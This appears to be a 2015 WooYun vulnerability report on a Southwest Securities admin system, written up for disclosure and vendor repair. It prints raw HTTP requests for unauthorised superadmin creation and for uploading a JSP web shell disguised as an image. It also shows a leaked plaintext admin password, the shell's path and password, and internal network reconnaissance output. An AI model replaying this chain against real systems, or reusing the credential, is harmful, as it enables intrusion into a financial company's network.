当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149591

漏洞标题:西南证券某系统大量页面未授权访问导致进后台上传可威胁内网

相关厂商:西南证券股份有限公司

漏洞作者: 路人甲

提交时间:2015-10-26 17:15

修复时间:2015-12-11 10:02

公开时间:2015-12-11 10:02

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

未授权访问导致新增超管帐号,进一步getshell可内网

详细说明:

西南证券后台管理

QQ截图20151026160129.jpg


问题地址:

http://www.swsc.com.cn:8080/manage/admin/admin.jsp


可直接新增超管帐号

QQ截图20151026164519.jpg


我新增了一个帐号wpp,密码wpp123
登录后台

QQ截图20151026164614.jpg


但是我发现居然都没有权限

QQ截图20151026164746.jpg

漏洞证明:

但是通过抓包得到具体页面的访问链接后,直接访问是可以操作

QQ截图20151026165005.jpg


比如http://www.swsc.com.cn:8080/manage/zsk/commoninfo.html

QQ截图20151026164945.jpg


所以好戏来了
http://www.swsc.com.cn:8080/manage/expert/expertinfo.htm

QQ截图20151026165101.jpg


QQ截图20151026165404.jpg


在回过头来看,访问http://www.swsc.com.cn:8080/manage/admin/admin.jsp时,抓包得到一个请求

POST http://www.swsc.com.cn:8080/manage/admin/getAdmin.jsp HTTP/1.1
Host: www.swsc.com.cn:8080
Connection: keep-alive
Content-Length: 8
Origin: http://www.swsc.com.cn:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://www.swsc.com.cn:8080/manage/admin/admin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=4BCD236BE71708F06A5C5A03AD8D5385
limit=10


QQ截图20151026165953.jpg


响应是所有管理用户的帐号和明文密码
得到超管帐号id:'sysadmin',password:'sswwsscc'
用超管登录系统上传shell

QQ截图20151026170437.jpg


抓包改包

POST http://www.swsc.com.cn:8080/managehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/upload.jsp?select=top HTTP/1.1
Host: www.swsc.com.cn:8080
Connection: keep-alive
Content-Length: 4381
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.swsc.com.cn:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3CbtnXiB0bdXaBER
Referer: http://www.swsc.com.cn:8080/managehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/upload.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=4BCD236BE71708F06A5C5A03AD8D5385
------WebKitFormBoundary3CbtnXiB0bdXaBER
Content-Disposition: form-data; name="select"
top
------WebKitFormBoundary3CbtnXiB0bdXaBER
Content-Disposition: form-data; name="attachFile"; filename="01.jsp"
Content-Type: image/gif
test
------WebKitFormBoundary3CbtnXiB0bdXaBER
Content-Disposition: form-data; name="borrow"
top
------WebKitFormBoundary3CbtnXiB0bdXaBER--


上传后的路径是http://www.swsc.com.cn:8080/managehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/banner_image.jsp
密码02q3

QQ截图20151026161742.jpg


[*] 基本信息 [ C:D:E:F:H: ]
D:\apache-tomcat-6.0.26\webapps\ROOT\manage\upload\> arp -a
Interface: 10.150.28.106 --- 0x10003
Internet Address Physical Address Type
10.150.28.101 00-22-19-d1-ea-68 dynamic
10.150.28.102 a4-ba-db-39-b3-58 dynamic
10.150.28.103 a4-ba-db-39-9d-24 dynamic
10.150.28.107 00-26-b9-fb-79-18 dynamic
10.150.28.254 00-00-0c-07-ac-1f dynamic
D:\apache-tomcat-6.0.26\webapps\ROOT\manage\upload\> net view
服务器名称 注释
-------------------------------------------------------------------------------
\\CRM-DBBAK
\\CWFWQ
\\CWFWQ3
\\HSSJWG 恒生数据网关
\\SVCTAG-8184W2X
\\SWSC-1HB3
\\SWSC-BIGDATA
\\SWSC-FXQ swsc-fxq
\\SWSC-NKXT-WEB1
\\UTJV
\\WIN-4UUEK1U2RPR
\\WIN-6F7S1SLEA18
\\WIN-6GTG26QFPMO
\\WIN-A0SKMQR8E83
\\WIN-BCN89NXXOTB
\\WIN-DU9SEX0HQ00
\\WIN-H31FA5OIY7U
\\WIN-I4EZHB0AK0Y
\\WIN-KFTGGVCR11B
\\WIN-QW7WXU1GFJD
\\WIN-ZT2JUMGEGSB
\\WIN3H41GR9AQTI
\\WINDOWS-AK1AC3G
\\WINDOWS-CH7GNP0
\\WINDOWS-G739AM2
\\WINDOWS-PE11G9N
\\WINDOWS-V2NIV3H
\\XNZQ-CWDB1
\\XY-WEB1 xy-WEB1
\\XY-WEB2
\\ZCGL-MC1
命令成功完成。
D:\apache-tomcat-6.0.26\webapps\ROOT\manage\upload\>


可威胁内网

QQ截图20151026161813.jpg


QQ截图20151026161821.jpg


QQ截图20151026171436.jpg


最后我把shell删除了

修复方案:

好吧,检查全站还有没有shell,下线系统修复漏洞

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-27 10:00

厂商回复:

非常感谢,我们正在积极修复,如还有遗漏请指出

最新状态:

暂无


漏洞评价:

评论